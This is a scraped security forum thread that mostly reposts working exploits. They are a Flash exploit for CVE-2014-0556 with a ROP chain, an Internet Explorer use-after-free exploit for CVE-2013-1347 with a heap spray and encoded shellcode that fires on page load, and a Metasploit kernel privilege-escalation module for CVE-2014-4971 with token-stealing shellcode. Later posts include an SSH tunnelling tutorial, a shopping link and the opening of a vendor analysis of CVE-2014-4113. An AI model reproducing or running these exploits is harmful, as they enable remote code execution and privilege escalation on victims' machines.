pune de-am-pulea niste spatii. Luati de la sursa. Sursa: [Python] CVE-2012-0002 - Pastebin.com
  18. Nytro
    [h=1]CVE-2014-0556[/h]By: hdarwin on Sep 27th, 2014 (edited) By: [URL="http://pastebin.com/u/hdarwin"]hdarwin[/URL] on Sep 27th, 2014 (edited) [LIST=1]/* <html> <head> <title>CVE-2014-0556</title> </head> <body> <object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br> <button onclick="swf.exploit()">STOP</button> </body> </html> */ /* First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0908a008 ebx=02ffa6a0 ecx=0b51f020 edx=4141411c esi=06a62020 edi=06a62020 eip=4141411c esp=02ffa5e4 ebp=02ffa610 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 4141411c ?? ??? */ package { import flash.events.* import flash.media.* import flash.display.* import flash.geom.* import flash.utils.* import flash.text.* import flash.system.Capabilities; import flash.external.ExternalInterface public class Main extends Sprite { private var i0:uint private var i1:uint private var i2:uint private var i3:uint private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & " + Capabilities.version) private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200) private var ob:Vector.<Object> = new Vector.<Object>(6400) private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff) private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4) private var snd:Sound private var vector:uint public function Main():void { for (i0 = 0; i0 < 3200; i0++) { ba[i0] = new ByteArray() ba[i0].length = 0x2000 ba[i0].position = 0xfffff000 } for (i0 = 0; i0 < 3200; i0++) { if (i0 % 2 == 0) ba[i0] = null ob[i0 * 2] = new Vector.<uint>(1008) ob[i0 * 2 + 1] = new Vector.<uint>(1008) } bitmap.copyPixelsToByteArray(rect, ba[1601]) for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break ob[i0][1024 * 3 - 2] = 0xffffffff for (i1 = 0; ; i1++) { if (i0 == i1) continue if (ob[i1].length != 1008) break } ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1] ob[i0].fixed = true for (i2 = 1000; ; i2++) { if ( ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15] ) { vector = ob[i1][0xFFFFFFFF - i2 + 11] str += "\n\nVector<uint> Address : " + vector.toString(16) break }else if ( ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15] ) { vector = ob[i1][i2 + 11] str += "\n\nVector<uint> Address : " + vector.toString(16) break } } snd = new Sound() for (i2 = 0; i2 < 6400; i2++) { if (i2 == i0 || i2 == i1) continue ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0; ; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { str += "\n\nDump Vector<Object>" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(ob[i0][i2 + i3 - 9].toString(16), 8) + "\t" } str += "\n\nDump Sound Object" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t" } str += "\n\nDump Sound Object V-Table" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t" } str += "\n\n*** V-Table Modify ***" write(ob[i0][i2 + 1] - 1, vector + 8) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } str += "\n\nDump Sound Object" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t" } str += "\n\nDump Sound Object V-Table" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t" } break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) / 4 - 2] = data } private function read(addr:uint):uint { return ob[i0][(addr - vector) / 4 - 2] } private function zeroPad(number:String, width:int):String { if (number.length < width) return "0" + zeroPad(number, width-1) return number } public function exploit():void { snd.toString() } } } ============================================================================================================================= /* <html> <head> <title>CVE-2014-0556</title> </head> <body> <object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br> <button onclick="swf.exploit()">STOP</button> </body> </html> */ /* (1728.eb0): Break instruction exception - code 80000003 (first chance) eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d63048 cc int 3 1:020> dd esp l4 08d63048 cccccccc cccccccc cccccccc cccccccc 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d63049 cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304a cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304b cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304c cc int 3 */ package { import flash.events.* import flash.media.* import flash.display.* import flash.geom.* import flash.utils.* import flash.text.* import flash.external.ExternalInterface public class Main extends Sprite { private var i0:uint private var i1:uint private var i2:uint private var i3:uint private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145") private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200) private var ob:Vector.<Object> = new Vector.<Object>(6400) private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff) private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4) private var snd:Sound private var vector:uint private var vtable:uint private var flash:uint public function Main():void { for (i0 = 0; i0 < 3200; i0++) { ba[i0] = new ByteArray() ba[i0].length = 0x2000 ba[i0].position = 0xfffff000 } for (i0 = 0; i0 < 3200; i0++) { if (i0 % 2 == 0) ba[i0] = null ob[i0 * 2] = new Vector.<uint>(1008) ob[i0 * 2 + 1] = new Vector.<uint>(1008) } bitmap.copyPixelsToByteArray(rect, ba[1601]) for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break ob[i0][1024 * 3 - 2] = 0xffffffff for (i1 = 0; ; i1++) { if (i0 == i1) continue if (ob[i1].length != 1008) break } ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1] ob[i0].fixed = true for (i2 = 1000; ; i2++) { if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) { vector = ob[i1][0xFFFFFFFF - i2 + 11] break } else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) { vector = ob[i1][i2 + 11] break } } snd = new Sound() for (i2 = 0; i2 < 6400; i2++) { if (i2 == i0 || i2 == i1) continue ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0; ; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { vtable = read(ob[i0][i2 + 1] - 1) flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx write(ob[i0][i2 + 1] - 1, vector + 0xf54) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN ob[i0][3] = 0x00000201 // 0x00000201 ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN ob[i0][5] = 0x00000040 // 0x00000040 ob[i0][6] = flash + 0x00691119 // POP ECX # RETN ob[i0][7] = vector + 2000 // Writable location ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP) ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN ob[i0][11] = flash + 0x0000d83f // JMP [EAX] ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect() ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp' ob[i0][16] = 0xcccccccc // shellcode ob[i0][17] = 0xcccccccc // shellcode ob[i0][18] = 0xcccccccc // shellcode ob[i0][19] = 0xcccccccc // shellcode ob[i0][979] = flash + 0x0029913A // POP EAX # RETN ob[i0][980] = 0x00000f58 ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 str += flash.toString(16) var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) / 4 - 2] = data } private function read(addr:uint):uint { return ob[i0][(addr - vector) / 4 - 2] } private function zeroPad(number:String, width:int):String { if (number.length < width) return "0" + zeroPad(number, width-1) return number } public function exploit():void { snd.toString() } } } [/LIST] Sursa: [ActionScript 3] CVE-2014-0556 - Pastebin.com
  19. Nytro
    MSIE Use After Free EXP/CVE-2013-1347 [URL="http://pastebin.com/JN2GiB8n#"][img=http://pastebin.com/i/t.gif][/URL] [LIST=1] <!doctype html> <HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> <script> pRESSURA = eval('unescape'); fAHPARIC = CollectGarbage; dISCESA = '%u'; function rIGUARDI(rEPLACEMENT) { return pRESSURA(dISCESA + rEPLACEMENT.substring(4, 8) + dISCESA + rEPLACEMENT.substring(0, 4)); } function vILMENTE(tRIPARTITO) { rAPPACIATI = (tRIPARTITO >>> 24).toString((0x10)); if (rAPPACIATI.length == 0x1) rAPPACIATI = "0" + rAPPACIATI; mOSTRARTI = ((tRIPARTITO >>> 16) & (0xff)).toString((0x10)); if (mOSTRARTI.length == 0x1) mOSTRARTI = "0" + mOSTRARTI; tERRENE = ((tRIPARTITO >>> 8) & (0xff)).toString((0x10)); if (tERRENE.length == 0x1) tERRENE = "0" + tERRENE; pRINCIPIO = (tRIPARTITO & (0xff)).toString((0x10)); if (pRINCIPIO.length == 0x1) pRINCIPIO = "0" + pRINCIPIO; return rAPPACIATI + mOSTRARTI + tERRENE + pRINCIPIO; } function ue(dw) { return rIGUARDI(vILMENTE(dw)); } function setc() { var Then = new Date() Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 3) document.cookie = "Cookie1=fucktheothers;expires=" + Then.toGMTString() } function readc() { var cookieString = new String(document.cookie); if (cookieString.indexOf("fucktheothers") == -1) { return 0 } else { return 1; } } function DropPayload() { // en = 77c10000 // kr = 77bc0000 // offset = 50000 var r = ""; r+= ue( 0x77bd4cfa ); // # POP EBP # RETN [msvcrt.dll] r+= ue( 0x77bd4cfa ); // # skip 4 bytes [msvcrt.dll] r += ue( 0x77BFFA1C); // # POP EBX # RETN [msvcrt.dll] r += ue( 0xffffffff ); // # EBX 0xffffffff (inc 201) for(i=0;i<=0x201;i++) { r += ue( 0x7d710b7e ); // # INC EBX # RETN [shell32.dll] } r+= ue( 0x77be4de1 ); // # POP EAX # RETN [msvcrt.dll] r+= ue( 0x2cfe04a7 ); // # put delta into eax (-> put += 0x00000040 into edx) r+= ue( 0x77bfeb80 ); // # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] r+= ue( 0x77c08fbc ); // # XCHG EAX,EDX # RETN [msvcrt.dll] r+= ue( 0x77bde33f ); // # POP ECX # RETN [msvcrt.dll] r+= ue( 0x77c0e062 ); // # &Writable location [msvcrt.dll] r+= ue( 0x77bf6116 ); // # POP EDI # RETN [msvcrt.dll] r+= ue( 0x77bf7a42 ); // # RETN (ROP NOP) [msvcrt.dll] r+= ue( 0x77beb8ba ); // # POP ESI # RETN [msvcrt.dll] r+= ue( 0x77bdaacc ); // # JMP [EAX] [msvcrt.dll] r+= ue( 0x77beb860 ); // # POP EAX # RETN [msvcrt.dll] r+= ue( 0x77bc1120 ); // # ptr to &VirtualProtect() [IAT msvcrt.dll] r+= ue( 0x77d03ad9); // # PUSHAD # RETN [user32.dll] r+= ue( 0x77c01025 ); // # ptr to 'push esp # ret ' [msvcrt.dll] return r; } function align_esp() { var r= ""; r += ue(0x77BFD801); return r; } function xchg_esp() { var r=""; r += ue(0x77BC5ED5); return r; } function helloWorld() { if (readc()) return; setc(); unicorn = unescape("ABCD"); unicorn2 = unescape("EEEE"); for (i=0; i < 2; i++) { unicorn += unescape("ABCD"); }unicorn += unescape("AB"); unicorn += DropPayload(); unicorn += "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\uFFE8\uFFFF\uC2FF\u9158\u8390\u04C4\u498D\u4112\u3180\u8089\u9039\uF775\uDB62\u02BF\uB5FC\u02BF\uBCFD\u8AF1\uDF7C\u02B7\uA9FF\u7C8A\u40BA\uC8C0\uBA24\uBF52\u3786\uA19D\u5FB3\u81FD\u4248\u8A84\uC953\u6662\u56B2\u6EFC\uB7D7\uD702\u8AAD\uEF54\u02B7\uC285\u02B7\u95D7\u548A\u02B7\u028D\u4C8A\uFC4A\uE5FB\uE6E4\uA7E7\uE5ED\u89E5\u49BA\u8AED\uB9C9\u86F1\u02B7\u85C9\u02B7\u95F9\uB724\uC902\u6281\uB785\uC902\uB7BD\uC904\uB7F5\uC902\u1CB5\uBA36\u0343\u61D2\u7609\u7676\u6508\u8889\u8989\uE1DD\u8889\u8989\u5976\uB136\u25AB\u616E\u76E1\u7676\u52BA\u7D02\uDADD\uDFDA\u5976\u0736\u87C7\u6165\u76DD\u7676\u650A\uBF8D\uA50A\uECAD\u5976\uD91C\uBF36\uA693\u61F9\u76B7\u7676\u02D4\uBA7D\uDA52\uDFDA\u8961\u8989\uD689\u4E0A\uDEC3\u61DA\u8989\u8989\u0AD6\u864E\uDCDE\u6502\uC9C9\uC9C9\u76C9\u3669\u7711\u8703\u8461\u7676\u0276\uE37D\uDF89\u8961\u8989\uD689\u4E0A\uDE86\u02DC\uC965\uC9C9\uC9C9\u6976\uF736\u6B51\u61FA\u7763\u7676\u76DA\uE159\uFDFD\uB3F9\uA6A6\uA7B8\uBABB\uA7BD\uB8B0\uBDA7\uA6BA\uECFA\uFAF1\uF1EC\uECA7\uECF1\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u1989\u1919\u1919\u1919\u1919"; animvalues = align_esp(); for (i=0; i < 0x70/4; i++) { if (i == 0x70/4-1) { animvalues += xchg_esp(); } else { animvalues += align_esp(); } } animvalues += unicorn; for(i = 0; i < 13; i++) { animvalues += ";red"; } f0 = document.createElement('span'); document.body.appendChild(f0); f1 = document.createElement('span'); document.body.appendChild(f1); f2 = document.createElement('span'); document.body.appendChild(f2); document.body.contentEditable="true"; f2.appendChild(document.createElement('datalist')); f1.appendChild(document.createElement('span')); f1.appendChild(document.createElement('table')); try{ f0.offsetParent=null; }catch(e) { }f2.innerHTML=""; f0.appendChild(document.createElement('hr')); f1.innerHTML=""; fAHPARIC(); try { a = document.getElementById('myanim'); a.values = animvalues; } catch(e) {} } </script> </head> <body onload="eval(helloWorld());"> <t:ANIMATECOLOR id="myanim"/> </body> </html> @PhysicalDrive0 [/LIST] Sursa: MSIE Use After Free EXP/CVE-2013-1347 - Pastebin.com
  20. Nytro
    [h=1]Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel include Msf::Post::File include Msf::Post::Windows::FileInfo include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation', 'Description' => %q{ A vulnerability within Microsoft Bluetooth Personal Area Networking module, BthPan.sys, can allow an attacker to inject memory controlled by the attacker into an arbitrary location. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC 'Jay Smith <jsmith[at]korelogic.com>' # MSF module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Targets' => [ ['Windows XP SP3', { 'HaliQuerySystemInfo' => 0x16bba, '_KPROCESS' => "\x44", '_TOKEN' => "\xc8", '_UPID' => "\x84", '_APLINKS' => "\x88" } ] ], 'References' => [ [ 'CVE', '2014-4971' ], [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ], [ 'OSVDB', '109387' ] ], 'DisclosureDate' => 'Jul 18 2014', 'DefaultTarget' => 0 )) end def ring0_shellcode tokenswap = "\x60\x64\xA1\x24\x01\x00\x00" tokenswap << "\x8B\x40\x44\x50\xBB\x04" tokenswap << "\x00\x00\x00\x8B\x80\x88" tokenswap << "\x00\x00\x00\x2D\x88" tokenswap << "\x00\x00\x00\x39\x98\x84" tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8" tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB" tokenswap << [session.sys.process.getpid].pack('V') tokenswap << "\x8B\x80\x88\x00\x00\x00" tokenswap << "\x2D\x88\x00\x00\x00" tokenswap << "\x39\x98\x84\x00\x00\x00" tokenswap << "\x75\xED\x89\xB8\xC8" tokenswap << "\x00\x00\x00\x61\xC3" end def fill_memory(proc, address, length, content) session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE") unless proc.memory.writable?(address) vprint_error("Failed to allocate memory") return nil end vprint_good("#{address} is now writable") result = proc.memory.write(address, content) if result.nil? vprint_error("Failed to write contents to memory") return nil end vprint_good("Contents successfully written to 0x#{address.to_s(16)}") return address end def disclose_addresses(t) addresses = {} hal_dispatch_table = find_haldispatchtable return nil if hal_dispatch_table.nil? addresses['halDispatchTable'] = hal_dispatch_table vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}") vprint_status('Getting the hal.dll base address...') hal_info = find_sys_base('hal.dll') if hal_info.nil? vprint_error('Failed to disclose hal.dll base address') return nil end hal_base = hal_info[0] vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}") hali_query_system_information = hal_base + t['HaliQuerySystemInfo'] addresses['HaliQuerySystemInfo'] = hali_query_system_information vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}") addresses end def check if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/ return Exploit::CheckCode::Safe end os = sysinfo["OS"] return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') return Exploit::CheckCode::Safe unless handle session.railgun.kernel32.CloseHandle(handle) return Exploit::CheckCode::Vulnerable end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end unless check == Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system") end handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') if handle.nil? fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device") end my_target = targets[0] print_status("Disclosing the HalDispatchTable address...") @addresses["halDispatchTable"] + 0x4, 0) session.railgun.kernel32.CloseHandle(handle) print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...") session.railgun.ntdll.NtQueryIntervalProfile(2, 4) print_status("Checking privileges after exploitation...") unless is_system? fail_with(Failure::Unknown, "The privilege escalation wasn't successful") end print_good("Privilege escalation successful!") p = payload.encoded print_status("Injecting #{p.length} bytes to memory and executing it...") unless execute_shellcode(p) fail_with(Failure::Unknown, "Error while executing the payload") end end end Sursa: http://www.exploit-db.com/exploits/34982/
  21. Nytro
    SSH tunnel [TABLE=class: toc] [TR] [TD]Contents 1 simple port forwarding (SSH tunneling) 1.1 port forwarding through an intermediary 1.2 reverse port forwarding 1.3 tricky reverse forwarding 1.4 Using scp through a DMZ gateway to a machine behind a firewall using a tunnel [*]2 Other options [*]3 SOCKS5 with Firefox [/TD] [/TR] [/TABLE] simple port forwarding (SSH tunneling) This example creates a tunnel for HTTP. This will forward port 80 of your localhost to port 80 of Example Domain. ssh -f -N -q -L 80:localhost:80 username@www.example.com This example creates a tunnel for IMAP. Here we forward port 1143 on localhost to 143 (IMAP) on imap.example.com. ssh -f -N -q -L 1143:localhost:143 username@imap.example.com -f tells ssh to go into the background (daemonize). -N tells ssh that you don't want to run a remote command. That is, you only want to forward ports. -q tells ssh to be quiet -L specifies the port forwarding port forwarding through an intermediary You can have the remote machine forward ports to a third machine. This is useful where your have your local machine outside a firewall; a visible machine on the DMZ; and a third machine invisible to the outside. This creates a tunnel from your localhost port 81 to 192.168.1.69 port 80 through dmz.example.com. This lets you see the web server from outside a LAN. ssh -f -N -q -L 81:192.168.1.69:80 username@dmz.example.com This example creates a tunnel for SSH itself, over localhost port 2222. ssh -f -N -q -L 2222:target-host.example.com:22 username@dmz.example.com This example creates a tunnel for IMAP. Here we forward port 1143 on localhost to 143 (IMAP) on 192.168.1.100 through dmz.example.com. ssh -f -N -q -L 1143:192.168.1.100:143 username@dmz.example.com VNC Viewer uses port 5900. This shows a double-hop. # localhost --> wan-gateway --> dmz-gateway --> vnc-console ssh -L 5900:localhost:5900 root@wan-gateway.example.com ssh -L 5900:vnc-console.example.com:5900 root@dmz-gateway.example.com reverse port forwarding This is used in the following situation: You have a server inside a private LAN that you want to connect to from the WAN outside. You can't create a NAT and port forwarding on your firewall to map the machine to the outside. You have a server outside that you can connect to from the server inside the LAN. What this does is creates a connection from the server in the LAN to the server outside. Once that connection is established the server outside starts listening on port 2222. All connections to port 2222 are sent back to port 22 of the server in the LAN. Now you can leave this connection running in your office; go home and ssh to your proxy server at port 2222 and you will be connecting to your server inside the LAN on port 22. ssh -f -N -q -R 2222:localhost:22 my_name@remote.example.com tricky reverse forwarding This allows a server on an internal LAN expose a service to the outside WAN. For example, I have a database server that will only accept connections from a specific development box. That dev box is inside the firewall. I want to connect to the database from outside the firewall. ssh -t -L 5432:localhost:1999 my_name@firewall.example.com ssh -t db_server ssh -t -R 1999:127.0.0.1:5432 my_name@firewall Using scp through a DMZ gateway to a machine behind a firewall using a tunnel First you setup port forwarding through an intermediary. This forwards your localhost port 2222 to port 22 on 192.168.1.100. Remember, that 192.168.1.100 is not on your local network; 192.168.1.100 is on the LAN network shared with 208.77.188.166. ssh -f -N -q -L 2222:192.168.1.100:22 user@208.77.188.166 scp -P 2222 transformers.avi user@localhost:. A diagram might help. Remember, port 22 is the SSH server port on the 192.168.1.100 machine. +---------------+ +----------------+ +----------------------+ | your | | remote DMZ | | server on remote LAN | | local machine | | server | | 192.168.1.100 | | | | 208.77.188.166 | | | | 2222: >-------| |-------> :22 | | | |\______________/| | | | | | | | | +---------------+ +----------------+ +----------------------+ Other options -o ExitOnForwardFailure=yes \ -o GSSAPIAuthentication=no \ -o GSSAPIAuthentication=no \ -o HashKnownHosts=no \ -o KbdInteractiveAuthentication=no \ -o PermitLocalCommand=yes \ -o LocalCommand="logger connected to %h" \ -o LocalForward=00:remote.example.com:000 \ -o ExitOnForwardFailure=yes \ -o NoHostAuthenticationForLocalhost=yes \ -o ProxyCommand=foo \ -o RemoteForward=foo \ -o RequestTTY=yes \ -o SendEnv=LC_* \ -o Tunnel=ethernet \ -o TunnelDevice=any:any \ -o VerifyHostKeyDNS=yes SOCKS5 with Firefox Simple and secure web browsing. You can setup a tunnel as described above or you can use the following technique. This starts SSH on your localhost acting as a SOCKS proxy. Once you start SSH this way you can point any application that supports a SOCKS5 interface to this port. But these instructions will show what you need to do to get Firefox to proxy through SOCKS. Firefox supports SOCKS with no extra add-ons. Start ssh an connection to a host that you want to proxy through. Use the -D option to specify a SOCKS5 port on your localhost. The port doesn't really matter. You just need to use the same port in your SOCKS client application. ssh -D 9999 username@proxy.example.com In Firefox select "Edit | Preferences | Advanced Tab | Connection Settings button". Then select "Manual proxy configuration". All you need to fill out is "SOCKS Host: Localhost", "Port: 9999", then select "SOCKS v5". It's easy. This tool can also help in switching the proxy settings on and off: SwitchProxy Tool Sursa: SSH tunnel - Noah.org
  22. Nytro
    Sau iti iei un mar: Sistem Desktop PC Mac mini cu procesor Intel® Core™ i7 2.30GHz, 4GB, 2TB, Intel® HD Graphics, OS X Server, RO - eMAG.ro
  23. Nytro
    An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) 6:35 pm (UTC-7) | by Weimin Wu (Threat Analyst) Three zero-day vulnerabilities - CVE-2014-4114, CVE-2014-4148, and CVE-2014-4113 - were reported last week and patched by Microsoft in their October 2014 Patch Tuesday. CVE-2014-4114, also known as the Sandworm vulnerability, can enable attackers to easily craft malware payloads when exploited. This particular vulnerability has been linked to targeted attacks against European sectors and industries. In addition, our researchers found that Sandworm was also being used to target hit SCADA systems. The latter two vulnerabilities (CVE-2014-4148, CVE-2014-4113) leveraged vulnerabilities in the Windows kernel (Win32k.sys), affecting most Windows versions. In 2013, only one Windows kernel zero-day, was made public; this particular vulnerability only affected some versions of Windows XP and Windows 2003. These new zero-days could be a sign that attackers are possibly shifting their focus back to kernel vulnerabilities. CVE-2014-4113 allows for the elevation of privileges when exploited successfully. Microsoft addressed this in MS14-058. The vulnerability affects both desktop and server versions from Windows XP and Server 2003 up to Windows 8.1 and Server 2012 R2. However, the currently available exploit code does not affect Windows 8 and later versions. With a parameter in the command line, the exploit code can create new processes with System privileges of an assigned program. EoP exploits are also believed to be used in targeted attacks, since the exploitable application does not have the privileges needed by attackers. This was seen in Stuxnet which employed CVE-2010-2743 (also in Win32k.sys) to EoP after using other exploit to infect system. The analysis of this vulnerability and its exploit will be based on samples with the following MD5 hashes: 